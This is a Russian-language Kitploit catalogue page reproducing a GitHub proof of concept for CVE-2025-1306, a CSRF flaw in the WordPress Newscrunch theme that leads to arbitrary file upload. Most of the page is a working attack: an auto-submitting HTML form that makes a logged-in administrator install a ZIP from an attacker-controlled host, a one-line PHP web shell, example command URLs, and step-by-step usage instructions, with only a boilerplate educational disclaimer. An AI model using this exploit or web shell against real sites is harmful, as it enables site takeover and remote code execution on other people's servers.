Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-1306 — Newscrunch <= 1.8.4 - Межсайтовая подделка запроса (CSRF), приводящая к произвольной загрузке файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-1306
Инструменты фишингаГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийОбучение и Образование
GitHubnxploited/cve-2025-1306

CVE-2025-1306

Newscrunch <= 1.8.4 - Межсайтовая подделка запроса (CSRF), приводящая к произвольной загрузке файлов

Репозиторий
531 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт Newscrunch (CVE-2025-1306)

🚨 Обзор

Этот эксплойт нацелен на уязвимость межсайтовой подделки запроса (CSRF), приводящей к произвольной загрузке файлов (CVE-2025-1306) в теме WordPress Newscrunch. Из-за отсутствия проверки nonce в функции newscrunch_install_and_activate_plugin() неаутентифицированный злоумышленник может обманом заставить вошедшего в систему администратора загрузить произвольные файлы на сервер, что приводит к удалённому выполнению кода (RCE).


🔥 Детали уязвимости

  • CVE ID: CVE-2025-1306
  • Затронутое программное обеспечение: тема WordPress Newscrunch (<= 1.8.4)
  • Классификация CWE: CWE-352 - Межсайтовая подделка запроса (CSRF)
  • Оценка CVSS: 8.8 (ВЫСОКАЯ)
  • Вектор: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
  • Дата публикации: 4 марта 2025 г.

🛑 Серьёзность и влияние

  • ✅ Удалённое выполнение кода (RCE)
  • ✅ Полная компрометация системы
  • ✅ Произвольная загрузка файлов через CSRF
  • ✅ Вектор атаки без аутентификации

Эксплуатируемость: Требуется, чтобы администратор перешёл по специально созданной вредоносной ссылке.


📜 Код эксплойта

Этот эксплойт заставляет аутентифицированного администратора выполнить CSRF-атаку, которая загружает вредоносный ZIP-файл, содержащий веб-шелл.

🔹 PoC - HTML-эксплойт

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Exploit CVE-2025-1306 By Nxploit ,Khaled AlEnazi</title>
</head>
<body>
    <h2>Click anywhere to load content...</h2>

    <script>
        function sendExploit() {
            var form = document.createElement("form");
            form.method = "POST";
            form.action = "http://target.com/wp-admin/admin-ajax.php?action=newscrunch_install_activate_plugin";

            var input = document.createElement("input");
            input.type = "hidden";
            input.name = "plugin_url";
            input.value = "http://attacker.com/shell.zip";

            form.appendChild(input);
            document.body.appendChild(form);
            form.submit();
        }

        
        window.onload = function() {
            sendExploit();
        };
    </script>
</body>
</html>

📌 Замените:

  • http://target.com/ на уязвимый сайт WordPress
  • http://attacker.com/shell.zip на вредоносную ZIP-нагрузку, содержащую веб-шелл.

🔹 Пример вредоносного PHP-шелла

root@kitploit:~
<?php system($_GET['cmd']); ?>

📌 После успешной эксплуатации получите доступ к шеллу:

root@kitploit:~
http://target.com/wp-content/plugins/shell.php?cmd=whoami

🚀 Как использовать

  1. Разместите HTML-файл на сайте, контролируемом атакующим.
  2. Отправьте вредоносную ссылку аутентифицированному администратору WordPress.
  3. Как только администратор посетит страницу, шелл загрузится автоматически.
  4. Выполняйте команды удалённо, используя:
    root@kitploit:~
    http://target.com/wp-content/plugins/shell.php?cmd=ls
    

⚠️ Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и исследований в области безопасности. Несанкционированная эксплуатация уязвимостей незаконна и наказуема по закону. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом. Используйте ответственно.


Скачать инструмент